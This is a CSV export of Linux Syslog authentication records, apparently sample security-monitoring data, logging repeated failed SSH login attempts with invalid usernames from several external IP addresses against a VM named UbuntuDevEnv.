+6084,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:40:48,UbuntuDevEnv,2019-06-26 16:40:48,auth,UbuntuDevEnv,info,"Received disconnect from 35.154.19.93 port 38004:11: Normal Shutdown, Thank you for playing [preauth]",39066,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,35.154.19.9,38004,,
+6085,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:40:48,UbuntuDevEnv,2019-06-26 16:40:48,auth,UbuntuDevEnv,info,Disconnected from invalid user elsearch 35.154.19.93 port 38004 [preauth],39066,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,elsearch,35.154.19.9,38004,,
+6086,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:41:07,UbuntuDevEnv,2019-06-26 16:41:06,auth,UbuntuDevEnv,info,Invalid user elsearch from 35.154.19.93 port 41282,39145,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,elsearch,35.154.19.9,41282,,
+6087,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:41:07,UbuntuDevEnv,2019-06-26 16:41:06,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=35.154.19.93,39145,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,35.154.19.9,,0,
+6088,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:41:07,UbuntuDevEnv,2019-06-26 16:41:06,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,39145,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+6089,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:41:09,UbuntuDevEnv,2019-06-26 16:41:08,auth,UbuntuDevEnv,info,Failed password for invalid user elsearch from 35.154.19.93 port 41282 ssh2,39145,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,elsearch,35.154.19.9,41282,,
+6090,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:41:09,UbuntuDevEnv,2019-06-26 16:41:08,auth,UbuntuDevEnv,info,"Received disconnect from 35.154.19.93 port 41282:11: Normal Shutdown, Thank you for playing [preauth]",39145,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,35.154.19.9,41282,,
+6091,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:41:09,UbuntuDevEnv,2019-06-26 16:41:08,auth,UbuntuDevEnv,info,Disconnected from invalid user elsearch 35.154.19.93 port 41282 [preauth],39145,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,elsearch,35.154.19.9,41282,,
+6092,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:41:29,UbuntuDevEnv,2019-06-26 16:41:29,auth,UbuntuDevEnv,info,Invalid user serveur from 81.0.212.18 port 59646,39229,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,serveur,81.0.212.1,59646,,
+6093,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:41:29,UbuntuDevEnv,2019-06-26 16:41:29,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=81.0.212.18,39229,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,81.0.212.1,,0,
+6094,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:41:29,UbuntuDevEnv,2019-06-26 16:41:29,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,39229,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+6095,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:41:31,UbuntuDevEnv,2019-06-26 16:41:31,auth,UbuntuDevEnv,info,Failed password for invalid user serveur from 81.0.212.18 port 59646 ssh2,39229,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,serveur,81.0.212.1,59646,,
+6096,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:41:31,UbuntuDevEnv,2019-06-26 16:41:31,auth,UbuntuDevEnv,info,Disconnected from invalid user serveur 81.0.212.18 port 59646 [preauth],39229,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,serveur,81.0.212.1,59646,,
+6097,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:41:31,UbuntuDevEnv,2019-06-26 16:41:31,auth,UbuntuDevEnv,info,Received disconnect from 81.0.212.18 port 59646:11: Bye Bye [preauth],39229,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,81.0.212.1,59646,,
+6098,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:41:32,UbuntuDevEnv,2019-06-26 16:41:31,auth,UbuntuDevEnv,info,Invalid user search from 35.154.19.93 port 44568,39235,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,search,35.154.19.9,44568,,
+6099,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:41:32,UbuntuDevEnv,2019-06-26 16:41:31,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=35.154.19.93,39235,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,35.154.19.9,,0,
+6100,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:41:32,UbuntuDevEnv,2019-06-26 16:41:31,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,39235,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+6101,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:41:34,UbuntuDevEnv,2019-06-26 16:41:33,auth,UbuntuDevEnv,info,Failed password for invalid user search from 35.154.19.93 port 44568 ssh2,39235,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,search,35.154.19.9,44568,,
+6102,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:41:34,UbuntuDevEnv,2019-06-26 16:41:34,auth,UbuntuDevEnv,info,"Received disconnect from 35.154.19.93 port 44568:11: Normal Shutdown, Thank you for playing [preauth]",39235,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,35.154.19.9,44568,,
+6103,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:41:34,UbuntuDevEnv,2019-06-26 16:41:34,auth,UbuntuDevEnv,info,Disconnected from invalid user search 35.154.19.93 port 44568 [preauth],39235,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,search,35.154.19.9,44568,,
+6104,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:41:39,UbuntuDevEnv,2019-06-26 16:41:39,auth,UbuntuDevEnv,info,Invalid user mardi from 171.8.199.77 port 56412,39243,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,mardi,171.8.199.7,56412,,
+6105,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:41:39,UbuntuDevEnv,2019-06-26 16:41:39,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,39243,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+6106,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:41:39,UbuntuDevEnv,2019-06-26 16:41:39,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=171.8.199.77,39243,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,171.8.199.7,,0,
+6107,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:41:42,UbuntuDevEnv,2019-06-26 16:41:41,auth,UbuntuDevEnv,info,Failed password for invalid user mardi from 171.8.199.77 port 56412 ssh2,39243,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,mardi,171.8.199.7,56412,,
+6108,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:41:42,UbuntuDevEnv,2019-06-26 16:41:41,auth,UbuntuDevEnv,info,Received disconnect from 171.8.199.77 port 56412:11: Bye Bye [preauth],39243,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,171.8.199.7,56412,,
+6109,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:41:42,UbuntuDevEnv,2019-06-26 16:41:41,auth,UbuntuDevEnv,info,Disconnected from invalid user mardi 171.8.199.77 port 56412 [preauth],39243,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,mardi,171.8.199.7,56412,,
+6110,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:41:55,UbuntuDevEnv,2019-06-26 16:41:55,auth,UbuntuDevEnv,info,Invalid user search from 35.154.19.93 port 47852,39322,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,search,35.154.19.9,47852,,
+6111,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:41:55,UbuntuDevEnv,2019-06-26 16:41:55,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,39322,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+6112,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:41:55,UbuntuDevEnv,2019-06-26 16:41:55,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=35.154.19.93,39322,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,35.154.19.9,,0,
+6113,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:41:58,UbuntuDevEnv,2019-06-26 16:41:57,auth,UbuntuDevEnv,info,Failed password for invalid user search from 35.154.19.93 port 47852 ssh2,39322,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,search,35.154.19.9,47852,,
+6114,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:41:58,UbuntuDevEnv,2019-06-26 16:41:57,auth,UbuntuDevEnv,info,Disconnected from invalid user search 35.154.19.93 port 47852 [preauth],39322,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,search,35.154.19.9,47852,,
+6115,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:41:58,UbuntuDevEnv,2019-06-26 16:41:57,auth,UbuntuDevEnv,info,"Received disconnect from 35.154.19.93 port 47852:11: Normal Shutdown, Thank you for playing [preauth]",39322,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,35.154.19.9,47852,,
+6116,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:42:20,UbuntuDevEnv,2019-06-26 16:42:20,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=35.154.19.93  user=mysql,39402,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,mysql,35.154.19.9,,0,
+6117,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:42:23,UbuntuDevEnv,2019-06-26 16:42:22,auth,UbuntuDevEnv,info,Failed password for mysql from 35.154.19.93 port 51140 ssh2,39402,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,35.154.19.9,51140,,
+6118,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:42:23,UbuntuDevEnv,2019-06-26 16:42:22,auth,UbuntuDevEnv,info,"Received disconnect from 35.154.19.93 port 51140:11: Normal Shutdown, Thank you for playing [preauth]",39402,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,35.154.19.9,51140,,
+6119,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:42:23,UbuntuDevEnv,2019-06-26 16:42:22,auth,UbuntuDevEnv,info,Disconnected from authenticating user mysql 35.154.19.93 port 51140 [preauth],39402,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,mysql,35.154.19.9,51140,,
+6120,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:42:45,UbuntuDevEnv,2019-06-26 16:42:44,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=35.154.19.93  user=mysql,39496,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,mysql,35.154.19.9,,0,
+6121,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:42:47,UbuntuDevEnv,2019-06-26 16:42:46,auth,UbuntuDevEnv,info,Failed password for mysql from 35.154.19.93 port 54432 ssh2,39496,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,35.154.19.9,54432,,
+6122,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:42:47,UbuntuDevEnv,2019-06-26 16:42:47,auth,UbuntuDevEnv,info,Disconnected from authenticating user mysql 35.154.19.93 port 54432 [preauth],39496,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,mysql,35.154.19.9,54432,,
+6123,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:42:47,UbuntuDevEnv,2019-06-26 16:42:47,auth,UbuntuDevEnv,info,"Received disconnect from 35.154.19.93 port 54432:11: Normal Shutdown, Thank you for playing [preauth]",39496,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,35.154.19.9,54432,,
+6124,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:42:59,UbuntuDevEnv,2019-06-26 16:42:59,auth,UbuntuDevEnv,info,Invalid user helen from 81.0.212.18 port 40714,39551,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,helen,81.0.212.1,40714,,
+6125,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:42:59,UbuntuDevEnv,2019-06-26 16:42:59,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,39551,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+6126,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:42:59,UbuntuDevEnv,2019-06-26 16:42:59,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=81.0.212.18,39551,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,81.0.212.1,,0,
+6127,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:43:01,UbuntuDevEnv,2019-06-26 16:43:01,auth,UbuntuDevEnv,info,Failed password for invalid user helen from 81.0.212.18 port 40714 ssh2,39551,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,helen,81.0.212.1,40714,,
+6128,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:43:01,UbuntuDevEnv,2019-06-26 16:43:01,auth,UbuntuDevEnv,info,Received disconnect from 81.0.212.18 port 40714:11: Bye Bye [preauth],39551,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,81.0.212.1,40714,,
+6129,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:43:01,UbuntuDevEnv,2019-06-26 16:43:01,auth,UbuntuDevEnv,info,Disconnected from invalid user helen 81.0.212.18 port 40714 [preauth],39551,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,helen,81.0.212.1,40714,,
+6130,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:43:08,UbuntuDevEnv,2019-06-26 16:43:08,auth,UbuntuDevEnv,info,Invalid user www from 35.154.19.93 port 57690,39586,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,www,35.154.19.9,57690,,
+6131,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:43:08,UbuntuDevEnv,2019-06-26 16:43:08,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=35.154.19.93,39586,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,35.154.19.9,,0,
+6132,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:43:08,UbuntuDevEnv,2019-06-26 16:43:08,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,39586,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+6133,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:43:11,UbuntuDevEnv,2019-06-26 16:43:10,auth,UbuntuDevEnv,info,Failed password for invalid user www from 35.154.19.93 port 57690 ssh2,39586,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,www,35.154.19.9,57690,,
+6134,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:43:11,UbuntuDevEnv,2019-06-26 16:43:10,auth,UbuntuDevEnv,info,"Received disconnect from 35.154.19.93 port 57690:11: Normal Shutdown, Thank you for playing [preauth]",39586,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,35.154.19.9,57690,,
+6135,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:43:11,UbuntuDevEnv,2019-06-26 16:43:10,auth,UbuntuDevEnv,info,Disconnected from invalid user www 35.154.19.93 port 57690 [preauth],39586,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,www,35.154.19.9,57690,,
+6136,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:43:32,UbuntuDevEnv,2019-06-26 16:43:31,auth,UbuntuDevEnv,info,Invalid user www from 35.154.19.93 port 60990,39669,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,www,35.154.19.9,60990,,
+6137,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:43:32,UbuntuDevEnv,2019-06-26 16:43:31,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=35.154.19.93,39669,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,35.154.19.9,,0,
+6138,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:43:32,UbuntuDevEnv,2019-06-26 16:43:31,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,39669,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+6139,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:43:34,UbuntuDevEnv,2019-06-26 16:43:33,auth,UbuntuDevEnv,info,Failed password for invalid user www from 35.154.19.93 port 60990 ssh2,39669,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,www,35.154.19.9,60990,,
+6140,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:43:34,UbuntuDevEnv,2019-06-26 16:43:34,auth,UbuntuDevEnv,info,"Received disconnect from 35.154.19.93 port 60990:11: Normal Shutdown, Thank you for playing [preauth]",39669,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,35.154.19.9,60990,,
+6141,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:43:34,UbuntuDevEnv,2019-06-26 16:43:34,auth,UbuntuDevEnv,info,Disconnected from invalid user www 35.154.19.93 port 60990 [preauth],39669,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,www,35.154.19.9,60990,,
+6142,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:43:52,UbuntuDevEnv,2019-06-26 16:43:52,auth,UbuntuDevEnv,info,Invalid user das from 171.8.199.77 port 42896,39742,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,das,171.8.199.7,42896,,
